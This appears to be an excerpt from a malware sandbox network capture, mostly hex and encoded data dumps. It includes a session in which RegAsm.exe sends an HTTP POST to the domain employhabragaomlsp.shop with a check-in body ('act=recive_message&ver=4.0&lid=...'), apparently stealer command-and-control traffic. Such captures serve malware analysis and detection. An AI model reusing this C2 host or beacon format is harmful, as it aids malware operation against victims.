2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 74 69 54 38 2b 2b 79 49 77 67 66 46 52 6e 4e 51 4f 41 64 56 6a 53 75 38 38 64 72 76 6a 58 46 34 38 79 6d 37 73 77 39 44 37 2b 59 32 35 4b 2b 73 66 42 6a 54 6c 39 38 66 36 59 53 37 77 34 64 61 66 36 34 37 57 4f 6a 4d 73 54 2f 67 5a 2b 75 6f 31 77 61 2f 76 6d 64 33 64 76 63 36 51 74 6c 65 6c 51 54 77 52 4b 77 56 42 30 35 75 66 76 4e 62 62 77 32 77 4f 4c 52 70 66 7a 4e 4f 67 43 69 6c 4e 71 52 75 62 54 69 61 51 41 58 46 78 33 47 57 2b 30 52 57 58 48 79 6b 4b 55 4e 38 7a 4c 51 71 5a 76 6e 72 75 6f 36 44 72 79 59 79 4a 2f 7a 33 35 74 38 51 48 6c 2f 44 61 55 35 67 31 5a 61 50 66 79 67 6a 43 61 33 4e 4d 7a 6f 78 36 76 67 7a 7a 73 44 76 70 2f 51 6d 62 6d 33 39 32 6b 47 47 52 55 5a 78 6c 33 6f 45 31 41 31 75 76 54 50 59 2f 4e 37 6f 49 4b 6f 35 65 6e 54 64 31 33 79 Data Ascii: tiT8++yIwgfFRnNQOAdVjSu88drvjXF48ym7sw9D7+Y25K+sfBjTl98f6YS7w4daf647WOjMsT/gZ+uo1wa/vmd3dvc6QtlelQTwRKwVB05ufvNbbw2wOLRpfzNOgCilNqRubTiaQAXFx3GW+0RWXHykKUN8zLQqZvnruo6DryYyJ/z35t8QHl/DaU5g1ZaPfygjCa3NMzox6vgzzsDvp/Qmbm392kGGRUZxl3oE1A1uvTPY/N7oIKo5enTd13y
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 47 39 2f 47 49 63 46 68 30 64 78 31 50 6d 47 56 59 39 75 65 72 46 61 62 73 36 79 65 54 4f 72 75 72 4c 64 30 76 59 2b 62 54 66 74 4b 2b 77 4f 30 78 52 4e 52 6e 43 51 4f 73 48 48 77 53 2f 39 73 42 68 70 58 57 67 67 74 7a 72 68 71 41 75 62 64 76 35 6e 35 69 2f 39 36 67 68 54 68 41 59 47 4d 78 64 37 68 78 56 4d 72 33 71 78 32 6d 37 4f 73 48 6f 77 4b 48 76 77 53 55 58 73 4a 37 4e 6b 37 6d 78 2f 32 34 43 55 56 70 38 70 6a 6d 6f 45 55 56 78 35 4c 71 4f 54 4c 41 68 79 2b 4f 42 6b 4f 33 46 4f 51 4b 6d 30 72 66 30 72 50 6d 59 43 42 64 35 66 33 2b 4e 56 65 52 57 42 58 50 38 39 63 39 75 74 53 66 48 35 4d 43 72 34 4d 51 79 43 72 69 53 33 35 4b 32 73 2f 74 6f 44 52 77 51 42 73 64 53 34 42 4e 63 4f 37 61 34 67 41 37 59 58 6f 6a 75 32 2b 57 32 69 58 63 30 70 35 6d 64 71 Data Ascii: G9/GIcFh0dx1PmGVY9uerFabs6yeTOrurLd0vY+bTftK+wO0xRNRnCQOsHHwS/9sBhpXWggtzrhqAubdv5n5i/96ghThAYGMxd7hxVMr3qx2m7OsHowKHvwSUXsJ7Nk7mx/24CUVp8pjmoEUVx5LqOTLAhy+OBkO3FOQKm0rf0rPmYCBd5f3+NVeRWBXP89c9utSfH5MCr4MQyCriS35K2s/toDRwQBsdS4BNcO7a4gA7YXoju2+W2iXc0p5mdq
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 6d 41 52 63 52 47 63 70 5a 36 77 52 50 4d 72 6a 32 77 69 62 39 58 61 4f 43 67 36 4c 32 69 32 39 48 38 4c 66 49 6e 4b 4f 78 38 79 4e 6d 65 67 74 61 70 54 6e 78 66 6a 5a 61 2f 50 2f 43 4a 75 74 33 69 4f 6e 4e 71 65 58 4d 50 41 36 30 6c 74 2b 53 75 4c 6e 2b 61 67 49 5a 47 42 50 66 58 2b 30 65 56 7a 69 35 39 4d 4e 6c 6f 54 62 4a 71 59 33 4e 68 61 42 33 41 71 6a 53 68 39 33 7a 6b 4d 4e 55 4c 56 46 38 66 39 49 63 67 48 31 45 57 64 65 54 6a 6d 47 2f 64 5a 43 72 67 36 54 6d 7a 44 6b 42 6f 70 7a 4e 6b 62 53 33 39 6d 73 47 46 68 67 61 77 30 44 67 46 31 30 2f 73 2f 44 48 59 72 49 78 7a 4f 58 45 35 61 43 6a 58 47 37 77 6c 63 66 66 36 2f 57 77 53 77 30 4c 44 6c 62 6a 57 65 67 52 54 53 65 6e 75 4b 59 4e 72 48 75 67 67 74 72 4e 68 61 42 33 41 72 7a 53 68 39 33 7a 73 2f Data Ascii: mARcRGcpZ6wRPMrj2wib9XaOCg6L2i29H8LfInKOx8yNmegtapTnxfjZa/P/CJut3iOnNqeXMPA60lt+SuLn+agIZGBPfX+0eVzi59MNloTbJqY3NhaB3AqjSh93zkMNULVF8f9IcgH1EWdeTjmG/dZCrg6TmzDkBopzNkbS39msGFhgaw0DgF10/s/DHYrIxzOXE5aCjXG7wlcff6/WwSw0LDlbjWegRTSenuKYNrHuggtrNhaB3ArzSh93zs/
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 48 78 2f 4f 57 4f 45 56 55 54 65 39 39 73 35 6f 73 33 57 47 67 61 6a 4f 72 73 77 76 52 65 6a 51 6e 37 2b 34 6f 65 56 67 48 68 63 54 47 49 30 36 67 77 6b 54 57 64 66 68 70 67 33 59 64 63 2f 6c 67 2f 32 73 69 7a 6b 58 74 4a 50 66 6c 37 71 37 2b 32 73 63 46 68 4d 66 77 31 7a 6a 45 6c 45 34 74 2f 48 4c 61 72 49 2b 77 65 7a 48 72 2b 6a 47 64 30 76 59 2b 62 54 66 74 4b 2b 77 4f 30 78 52 4f 42 66 43 57 61 68 2b 4e 69 37 79 6b 4b 56 2f 32 31 36 6a 71 63 53 70 72 70 4e 31 52 62 65 61 31 35 47 77 73 66 74 76 41 68 41 64 45 73 68 61 37 78 6c 61 4f 4c 76 34 79 48 53 30 4f 4d 48 70 79 4b 7a 6b 7a 7a 59 4f 38 4e 79 33 39 4e 6a 33 39 33 74 4f 53 56 5a 55 2f 31 58 2b 42 6c 35 78 31 4a 50 52 4b 4e 68 64 6f 2f 43 72 7a 6f 57 4c 4d 41 6e 77 79 70 33 66 76 71 58 78 5a 68 77 Data Ascii: Hx/OWOEVUTe99s5os3WGgajOrswvRejQn7+4oeVgHhcTGI06gwkTWdfhpg3Ydc/lg/2sizkXtJPfl7q7+2scFhMfw1zjElE4t/HLarI+wezHr+jGd0vY+bTftK+wO0xROBfCWah+Ni7ykKV/216jqcSprpN1Rbea15GwsftvAhAdEsha7xlaOLv4yHS0OMHpyKzkzzYO8Ny39Nj393tOSVZU/1X+Bl5x1JPRKNhdo/CrzoWLMAnwyp3fvqXxZhw
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 56 50 6b 47 56 34 2b 76 2f 76 50 62 4b 45 6e 78 4f 44 4c 6f 4f 4c 41 4f 51 4f 69 6c 4e 43 57 73 4c 54 35 5a 41 59 64 48 68 66 4b 45 71 5a 2b 4e 6c 72 38 2f 39 59 6d 36 33 65 49 79 74 53 31 34 34 74 66 62 71 2f 63 74 2f 53 71 33 35 73 49 54 68 59 59 56 4a 55 51 71 42 35 51 4f 62 62 38 79 57 75 30 4d 38 48 37 79 71 44 67 79 7a 4d 4f 76 35 54 62 6e 4c 4f 6c 39 6d 63 47 45 68 6b 5a 77 31 48 73 56 68 4e 5a 31 35 4f 4f 59 61 74 31 6b 4b 75 44 6c 2b 50 46 4c 41 71 33 67 39 58 66 32 39 7a 76 4c 57 5a 36 44 58 79 6d 4f 61 67 52 55 58 48 6b 75 6f 35 69 76 53 66 44 36 4d 69 75 34 4d 77 34 41 4c 71 53 30 4a 75 77 75 66 74 69 44 52 6b 5a 47 63 4e 59 34 52 39 61 50 62 6a 2f 6a 69 6a 62 58 71 4f 70 78 4c 32 75 6b 33 56 46 6d 37 50 79 73 37 53 74 73 41 74 6c 44 6c 70 38 Data Ascii: VPkGV4+v/vPbKEnxODLoOLAOQOilNCWsLT5ZAYdHhfKEqZ+Nlr8/9Ym63eIytS144tfbq/ct/Sq35sIThYYVJUQqB5QObb8yWu0M8H7yqDgyzMOv5TbnLOl9mcGEhkZw1HsVhNZ15OOYat1kKuDl+PFLAq3g9Xf29zvLWZ6DXymOagRUXHkuo5ivSfD6Miu4Mw4ALqS0JuwuftiDRkZGcNY4R9aPbj/jijbXqOpxL2uk3VFm7Pys7StsAtlDlp8
2024-05-23 22:22:05 UTC	716	IN	Data Raw: 31 63 4d 71 72 31 33 69 62 62 58 74 65 6e 71 38 37 33 6f 31 78 75 38 4a 58 54 33 2b 76 31 73 47 55 48 46 78 4d 53 77 30 44 74 45 46 49 2b 74 66 48 4b 62 72 41 31 7a 4f 33 45 6f 4f 33 48 50 41 4b 7a 6e 64 75 57 76 62 37 2f 49 30 42 35 66 33 2b 4e 56 66 42 57 42 58 50 38 32 64 56 6c 76 7a 69 49 67 61 69 36 6f 4b 4e 63 48 4e 6a 35 74 4e 2b 30 75 37 41 37 54 46 45 59 47 73 68 53 34 68 42 5a 4e 4c 72 79 79 32 61 34 4e 73 66 74 78 61 48 68 79 7a 77 4d 73 5a 54 61 6c 62 69 78 2f 57 41 49 46 31 52 61 70 54 6d 44 56 6c 6f 70 2f 4b 43 4d 4a 70 4d 75 78 65 58 45 35 59 61 67 4b 45 76 59 2b 63 62 33 32 4e 79 77 5a 41 4a 52 54 46 61 4e 57 65 51 53 57 6a 47 78 2b 38 5a 6a 74 7a 2f 4e 36 63 75 33 35 73 73 77 46 36 4b 53 31 70 71 2f 74 50 42 6e 43 42 67 53 46 38 6b 53 70 Data Ascii: 1cMqr13ibbXtenq873o1xu8JXT3+v1sGUHFxMSw0DtEFI+tfHKbrA1zO3EoO3HPAKznduWvb7/I0B5f3+NVfBWBXP82dVlvziIgai6oKNcHNj5tN+0u7A7TFEYGshS4hBZNLryy2a4NsftxaHhyzwMsZTalbix/WAIF1RapTmDVlop/KCMJpMuxeXE5YagKEvY+cb32NywZAJRTFaNWeQSWjGx+8Zjtz/N6cu35sswF6KS1pq/tPBnCBgSF8kSp
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 31 32 37 31 0d 0a 62 67 41 52 56 46 71 6c 4f 59 4e 57 57 69 6e 38 6f 49 77 6d 6b 43 4c 65 34 39 6a 6c 68 71 41 6f 53 39 6a 35 78 76 66 59 33 4c 42 6b 41 6c 46 4d 56 6f 31 66 37 78 68 56 4e 37 4c 2b 33 47 71 38 4d 38 6a 6f 79 61 6a 69 77 44 41 4c 75 35 54 61 6b 72 4f 78 39 6d 63 4b 46 52 6f 58 6a 52 79 41 66 54 5a 78 75 2b 43 4f 50 76 46 31 37 38 54 79 35 38 33 63 49 51 2b 33 6e 73 6d 55 73 72 54 6d 62 68 35 52 66 48 2f 53 48 49 42 39 52 46 6e 58 6b 34 35 68 76 33 57 51 71 34 4f 75 34 4d 34 32 43 62 71 56 30 59 32 79 76 66 78 69 43 52 59 66 42 73 5a 41 34 78 35 65 50 37 54 78 7a 6d 69 7a 4e 4d 58 70 67 2b 75 47 6f 46 78 46 74 34 71 66 78 2f 48 33 31 55 41 5a 42 78 35 57 37 6b 58 2b 48 46 6f 39 71 76 50 50 5a 61 55 34 32 4b 6d 72 7a 76 47 46 58 32 36 70 2b Data Ascii: 1271bgARVFqlOYNWWin8oIwmkCLe49jlhqAoS9j5xvfY3LBkAlFMVo1f7xhVN7L+3Gq8M8joyajiwDALu5TakrOx9mcKFRoXjRyAfTZxu+COPvF178Ty583cIQ+3nsmUsrTmbh5RfH/SHIB9RFnXk45hv3WQq4Ou4M42CbqV0Y2yvfxiCRYfBsZA4x5eP7TxzmizNMXpg+uGoFxFt4qfx/H31UAZBx5W7kX+HFo9qvPPZaU42KmrzvGFX26p+
2024-05-23 22:22:05 UTC	1369	IN	Data Raw: 34 2b 32 4a 4f 58 33 78 2f 70 68 4c 75 56 67 56 7a 37 4c 61 6d 44 64 68 31 7a 50 69 44 2f 61 79 62 5a 56 37 6c 77 59 6a 50 34 64 2b 62 66 45 42 35 66 77 32 6c 4f 59 4e 57 53 33 48 6b 75 70 77 6f 32 31 36 6a 71 64 48 6c 74 6f 6c 33 51 72 36 66 33 70 79 39 74 4f 4a 78 43 42 49 43 46 34 70 73 31 6a 64 51 4f 72 44 31 77 57 32 4e 43 2b 6e 6b 79 4b 6e 6a 78 44 77 37 6a 6f 66 63 6b 62 32 77 35 6e 4a 4f 58 33 78 2f 70 68 4c 6e 56 67 56 7a 68 62 69 47 4a 6f 78 37 6f 49 4b 6f 35 66 61 4c 62 30 66 77 70 39 79 52 76 62 44 6d 63 6b 4d 77 47 52 2f 42 58 2b 63 64 48 58 2f 55 6b 36 55 6d 74 58 57 51 71 35 50 72 68 71 42 63 52 62 53 44 6e 38 66 78 35 36 49 34 57 30 4a 44 52 4a 38 36 67 77 6b 54 57 64 66 68 70 67 33 59 64 64 36 70 6d 2b 65 38 68 56 39 75 32 39 4c 4e 33 2b Data Ascii: 4+2JOX3x/phLuVgVz7LamDdh1zPiD/aybZV7lwYjP4d+bfEB5fw2lOYNWS3Hkupwo216jqdHltol3Qr6f3py9tOJxCBICF4ps1jdQOrD1wW2NC+nkyKnjxDw7jofckb2w5nJOX3x/phLnVgVzhbiGJox7oIKo5faLb0fwp9yRvbDmckMwGR/BX+cdHX/Uk6UmtXWQq5PrhqBcRbSDn8fx56I4W0JDRJ86gwkTWdfhpg3Ydd6pm+e8hV9u29LN3+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49719	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:05 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: employhabragaomlsp.shop
2024-05-23 22:22:05 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-23 22:22:06 UTC	820	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bqvtupqi0opkfha9jomt3r4oht; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMh%2FhH60NIHzV%2B%2BMDbdQJAJTa6%2BhPB8JA5DRgacWip5ZhucwkwmRQri7PEtXXpdrGjukby%2FfwkWGYBNMBUjbggt88cC6q%2FV1cKpVG6ocyPG8yeX0wujxfuH1Njth%2BK3pwrEBIpA3YJicfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887156ba584276-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:06 UTC	549	IN	Data Raw: 33 64 62 34 0d 0a 4d 53 33 6e 76 6c 59 6b 55 55 4d 6c 6f 44 58 48 72 65 33 38 6f 38 54 45 57 50 63 50 31 6e 63 70 44 31 74 76 79 43 53 50 37 6b 6c 4b 4a 2b 36 63 49 41 5a 72 59 78 47 4d 50 38 36 50 6e 70 6d 42 2f 75 51 73 68 58 71 7a 57 79 4d 47 65 51 36 73 42 72 58 4f 4c 31 42 42 6c 4e 74 36 4c 6c 68 68 53 4e 67 58 2f 59 32 32 39 71 71 2f 7a 6c 48 2b 4c 62 4d 5a 43 7a 56 37 54 62 39 42 37 59 73 78 52 55 69 4a 7a 54 39 4c 50 77 4e 49 78 55 47 6d 77 49 79 50 79 4f 71 74 4e 39 55 6a 33 48 34 67 4c 54 34 56 36 68 36 76 7a 41 52 55 57 59 62 7a 4e 31 63 36 59 51 6d 71 50 4d 36 50 69 49 69 42 2f 75 52 36 71 79 32 6d 46 6c 74 75 4e 68 79 55 42 72 57 56 46 52 4e 45 6b 39 73 6b 52 53 55 71 53 73 35 47 6d 34 2f 58 79 70 50 30 39 47 6a 48 63 76 52 39 49 48 4a 52 5a Data Ascii: 3db4MS3nvlYkUUMloDXHre38o8TEWPcP1ncpD1tvyCSP7klKJ+6cIAZrYxGMP86PnpmB/uQshXqzWyMGeQ6sBrXOL1BBlNt6LlhhSNgX/Y229qq/zlH+LbMZCzV7Tb9B7YsxRUiJzT9LPwNIxUGmwIyPyOqtN9Uj3H4gLT4V6h6vzARUWYbzN1c6YQmqPM6PiIiB/uR6qy2mFltuNhyUBrWVFRNEk9skRSUqSs5Gm4/XypP09GjHcvR9IHJRZ
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 46 42 56 49 55 77 69 32 47 7a 43 78 66 44 39 32 65 64 45 41 39 49 45 72 43 52 61 33 45 68 4a 76 54 72 61 38 33 6d 47 32 35 48 30 52 75 4f 51 71 67 54 4f 4b 47 4c 31 35 43 67 39 77 30 42 6e 31 4a 4c 4b 6b 58 6f 74 66 50 78 6f 50 6d 68 54 2b 46 61 72 67 44 43 56 64 35 5a 63 46 5a 6f 2b 64 70 45 53 66 75 78 56 77 74 57 47 46 41 7a 68 66 39 6a 63 2b 57 78 4b 57 6c 4d 5a 70 75 76 42 35 5a 62 53 73 4c 70 30 50 2f 69 69 35 64 52 59 62 4f 50 6b 67 31 49 6b 37 4a 58 71 44 49 69 39 36 50 7a 73 31 52 31 57 71 73 56 52 4d 76 65 53 79 6e 54 65 47 47 50 46 4d 50 37 62 63 72 43 46 74 4b 58 71 6f 38 7a 6f 2b 49 6b 6f 48 2b 35 48 71 52 62 4c 41 55 54 32 4d 33 43 61 5a 41 34 34 45 6b 56 55 57 46 32 7a 35 4f 4f 79 42 4b 79 56 69 6c 79 6f 4b 61 78 36 71 6e 50 39 55 6a 33 48 Data Ascii: FBVIUwi2GzCxfD92edEA9IErCRa3EhJvTra83mG25H0RuOQqgTOKGL15Cg9w0Bn1JLKkXotfPxoPmhT+FargDCVd5ZcFZo+dpESfuxVwtWGFAzhf9jc+WxKWlMZpuvB5ZbSsLp0P/ii5dRYbOPkg1Ik7JXqDIi96Pzs1R1WqsVRMveSynTeGGPFMP7bcrCFtKXqo8zo+IkoH+5HqRbLAUT2M3CaZA44EkVUWF2z5OOyBKyVilyoKax6qnP9Uj3H
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 54 61 6c 4b 34 49 55 75 58 46 32 50 30 44 56 55 4e 43 68 4f 79 46 61 72 77 49 53 53 78 4c 53 74 4e 5a 31 69 74 52 68 47 5a 6a 30 4e 36 67 69 46 35 30 41 54 53 4a 32 63 62 41 52 7a 41 45 72 4e 52 61 62 65 7a 61 76 43 71 4b 67 39 67 79 33 63 66 6c 51 6a 55 57 61 7a 4c 6f 62 6e 61 31 52 44 78 59 52 32 42 6a 49 74 53 38 4e 59 6f 38 57 48 6e 63 43 30 72 7a 57 64 59 72 30 55 53 47 6b 34 42 37 68 55 37 59 41 35 58 30 57 44 30 7a 6c 4b 63 32 38 76 71 54 7a 6c 79 4a 66 65 6d 65 54 6d 45 4a 5a 35 74 78 38 4a 57 44 6f 44 70 45 48 37 7a 45 4d 34 55 4d 75 30 58 31 39 62 53 69 79 43 55 4b 6d 50 31 39 79 42 71 36 63 79 6b 33 2b 37 47 45 68 6a 4e 77 4b 76 53 65 57 4d 4b 31 35 4b 67 64 63 2f 52 54 34 6c 56 63 68 58 72 63 71 4f 6c 4d 76 6d 36 46 4c 2b 42 76 51 53 55 79 31 Data Ascii: TalK4IUuXF2P0DVUNChOyFarwISSxLStNZ1itRhGZj0N6giF50ATSJ2cbARzAErNRabezavCqKg9gy3cflQjUWazLobna1RDxYR2BjItS8NYo8WHncC0rzWdYr0USGk4B7hU7YA5X0WD0zlKc28vqTzlyJfemeTmEJZ5tx8JWDoDpEH7zEM4UMu0X19bSiyCUKmP19yBq6cyk3+7GEhjNwKvSeWMK15Kgdc/RT4lVchXrcqOlMvm6FL+BvQSUy1
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 75 69 65 49 31 56 49 69 64 51 78 53 54 55 6b 53 73 56 63 70 74 32 64 6e 63 57 6f 71 6e 72 62 42 64 39 2b 43 32 6f 68 54 66 49 45 72 61 6b 38 55 46 2b 44 33 33 51 75 57 44 34 4a 71 6a 79 38 70 2b 54 31 67 61 47 71 65 73 30 76 39 42 56 46 59 54 49 4b 6f 55 33 70 69 43 74 65 52 49 76 53 50 55 6f 37 4c 55 44 51 57 71 44 48 68 5a 66 45 71 71 73 35 68 32 36 31 56 51 55 46 55 6d 62 71 51 66 58 4d 63 78 45 50 6f 75 38 44 5a 58 4e 4a 4c 4e 30 5a 7a 61 53 57 39 71 72 4e 35 6a 32 5a 4c 65 78 58 43 32 77 78 43 71 52 43 2f 34 49 35 58 55 69 46 32 6a 78 4f 4e 43 31 4a 7a 45 57 74 7a 6f 2b 51 7a 71 36 76 50 70 52 70 73 42 6c 4d 4c 58 64 6c 77 53 32 74 69 7a 4d 54 46 38 65 63 48 45 55 70 4f 77 58 73 58 4b 58 49 6e 34 6a 61 35 73 35 52 69 69 50 63 66 6c 49 46 55 6d 62 71 Data Ascii: uieI1VIidQxSTUkSsVcpt2dncWoqnrbBd9+C2ohTfIErak8UF+D33QuWD4Jqjy8p+T1gaGqes0v9BVFYTIKoU3piCteRIvSPUo7LUDQWqDHhZfEqqs5h261VQUFUmbqQfXMcxEPou8DZXNJLN0ZzaSW9qrN5j2ZLexXC2wxCqRC/4I5XUiF2jxONC1JzEWtzo+Qzq6vPpRpsBlMLXdlwS2tizMTF8ecHEUpOwXsXKXIn4ja5s5RiiPcflIFUmbq
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 74 58 52 49 72 51 4f 6b 6f 34 4b 6b 7a 42 58 61 7a 4d 67 35 6a 41 71 4b 59 30 6c 53 33 36 66 53 41 47 65 51 71 79 42 72 58 4f 61 33 4e 45 6b 38 6b 33 56 6a 55 6d 53 34 49 2f 7a 74 44 42 39 71 71 2f 7a 6c 48 2b 4c 62 4d 5a 43 7a 56 37 54 61 52 55 36 59 30 72 57 30 61 4a 31 7a 78 55 4e 43 5a 4d 7a 46 6d 75 79 34 4f 58 79 71 2b 6a 4e 70 52 6d 76 52 42 50 5a 7a 38 41 36 67 69 46 35 30 41 54 53 4a 32 63 62 41 52 7a 44 55 54 4e 58 4f 57 6e 35 49 47 50 7a 73 30 6a 2f 51 62 66 56 55 78 68 65 56 58 6f 42 75 71 45 49 31 31 4d 67 39 63 34 53 6a 49 6f 51 63 64 66 6f 73 43 49 6c 38 61 6d 6f 43 69 53 59 4c 30 56 51 47 51 7a 43 61 74 4e 72 63 4a 44 4f 43 54 46 32 79 77 47 61 32 4d 48 38 46 43 7a 33 34 7a 65 71 63 32 35 64 50 34 46 33 77 77 6a 42 6c 4a 4e 72 55 71 74 31 Data Ascii: tXRIrQOko4KkzBXazMg5jAqKY0lS36fSAGeQqyBrXOa3NEk8k3VjUmS4I/ztDB9qq/zlH+LbMZCzV7TaRU6Y0rW0aJ1zxUNCZMzFmuy4OXyq+jNpRmvRBPZz8A6giF50ATSJ2cbARzDUTNXOWn5IGPzs0j/QbfVUxheVXoBuqEI11Mg9c4SjIoQcdfosCIl8amoCiSYL0VQGQzCatNrcJDOCTF2ywGa2MH8FCz34zeqc25dP4F3wwjBlJNrUqt1
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 75 6e 44 4e 4b 63 33 6b 46 67 6c 61 70 77 49 79 52 77 71 57 6e 4d 49 64 2f 75 42 78 44 61 44 55 47 70 45 44 2f 69 69 52 61 54 49 62 56 4d 30 34 2f 4b 30 54 46 46 2b 75 6e 35 50 57 42 6f 62 35 36 7a 53 2f 30 4e 6c 78 39 4e 45 33 43 4c 66 4c 43 51 7a 68 57 37 62 64 66 42 6a 51 74 42 35 6f 56 35 63 65 43 6c 73 75 69 6f 54 65 53 61 37 30 48 51 6d 67 33 44 61 35 4e 34 6f 6f 76 55 45 2b 58 32 6a 42 4f 4d 43 78 4b 7a 46 53 68 6a 38 48 32 71 73 33 6d 50 59 30 74 37 46 63 4c 58 7a 51 44 73 55 6e 71 6e 53 45 54 4a 2b 37 44 65 69 35 59 4f 43 2b 70 50 4f 58 49 67 39 36 5a 35 4f 59 2b 6d 33 2b 2f 46 45 42 6d 4e 77 71 6c 51 2b 65 4d 4a 46 64 4d 69 39 63 31 52 54 73 73 53 73 78 64 72 4d 61 49 6b 73 57 68 35 6e 54 39 42 74 39 56 54 48 56 35 56 65 67 47 78 71 30 47 66 30 Data Ascii: unDNKc3kFglapwIyRwqWnMId/uBxDaDUGpED/iiRaTIbVM04/K0TFF+un5PWBob56zS/0Nlx9NE3CLfLCQzhW7bdfBjQtB5oV5ceClsuioTeSa70HQmg3Da5N4oovUE+X2jBOMCxKzFShj8H2qs3mPY0t7FcLXzQDsUnqnSETJ+7Dei5YOC+pPOXIg96Z5OY+m3+/FEBmNwqlQ+eMJFdMi9c1RTssSsxdrMaIksWh5nT9Bt9VTHV5VegGxq0Gf0
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 5a 53 51 33 54 63 56 62 73 38 53 4f 6e 64 65 72 74 6e 72 39 42 71 74 62 49 77 59 67 5a 63 45 74 72 59 73 6e 45 78 66 48 6e 44 4a 50 4e 53 5a 42 7a 45 57 67 79 59 43 52 79 4b 2b 69 4d 70 5a 74 73 42 46 4d 61 44 6f 42 6f 55 48 75 67 79 39 61 51 59 7a 54 64 41 68 62 53 69 79 43 55 4c 32 50 31 39 79 42 68 37 30 35 6d 57 44 30 66 53 42 79 64 32 58 42 58 34 58 6e 51 42 4e 49 69 5a 78 73 42 48 4d 74 53 63 64 58 72 38 6d 4c 6d 38 65 73 6f 7a 71 65 62 72 73 52 54 57 6b 32 44 61 46 50 37 49 6f 75 57 55 53 44 30 54 64 41 4e 57 45 4a 71 6a 7a 4f 6a 34 69 47 67 66 37 6b 65 72 56 32 75 52 6c 4d 4c 56 46 6d 74 51 69 46 35 7a 49 37 4a 4f 36 63 4d 30 70 7a 65 51 57 43 58 4b 6e 4c 69 4a 37 4d 70 61 34 2f 6b 57 65 78 46 55 4e 2f 4d 51 32 74 56 50 2b 4d 49 6c 5a 44 68 74 77 Data Ascii: ZSQ3TcVbs8SOndertnr9BqtbIwYgZcEtrYsnExfHnDJPNSZBzEWgyYCRyK+iMpZtsBFMaDoBoUHugy9aQYzTdAhbSiyCUL2P19yBh705mWD0fSByd2XBX4XnQBNIiZxsBHMtScdXr8mLm8esozqebrsRTWk2DaFP7IouWUSD0TdANWEJqjzOj4iGgf7kerV2uRlMLVFmtQiF5zI7JO6cM0pzeQWCXKnLiJ7Mpa4/kWexFUN/MQ2tVP+MIlZDhtw
2024-05-23 22:22:06 UTC	1369	IN	Data Raw: 53 2b 70 50 4a 71 42 35 2f 57 71 35 72 35 36 7a 53 2f 30 49 45 68 6a 4e 77 71 38 56 36 43 72 4a 56 52 4f 6b 38 77 6a 53 58 4e 76 4c 36 6b 38 35 63 6e 50 78 6f 50 31 36 46 4c 2b 42 76 51 52 57 69 31 68 54 2f 6f 55 74 74 6c 34 42 42 2f 58 74 46 39 5a 66 55 6b 73 32 7a 2f 4f 70 4d 2b 49 67 66 37 6b 61 4e 73 46 33 33 34 4c 66 33 6c 56 36 41 61 71 6a 7a 6c 42 53 59 62 4b 4e 77 45 4e 48 32 44 55 58 61 4c 66 69 49 6e 4f 35 75 68 53 2f 67 62 30 47 67 73 31 65 7a 54 43 4c 59 62 6e 61 31 70 49 6e 73 30 69 53 79 4d 6d 42 36 6f 38 7a 76 44 42 39 71 72 4e 35 69 4c 56 4e 66 5a 56 66 6d 34 33 41 36 31 51 2f 4d 45 4d 52 55 57 43 7a 44 4e 52 50 47 45 4a 71 6a 7a 4f 6a 34 6e 65 6d 65 54 31 64 50 30 47 33 31 56 50 66 48 6c 56 36 42 61 2f 31 33 34 41 47 4e 57 4f 58 43 30 73 Data Ascii: S+pPJqB5/Wq5r56zS/0IEhjNwq8V6CrJVROk8wjSXNvL6k85cnPxoP16FL+BvQRWi1hT/oUttl4BB/XtF9ZfUks2z/OpM+Igf7kaNsF334Lf3lV6AaqjzlBSYbKNwENH2DUXaLfiInO5uhS/gb0Ggs1ezTCLYbna1pIns0iSyMmB6o8zvDB9qrN5iLVNfZVfm43A61Q/MEMRUWCzDNRPGEJqjzOj4nemeT1dP0G31VPfHlV6Ba/134AGNWOXC0s
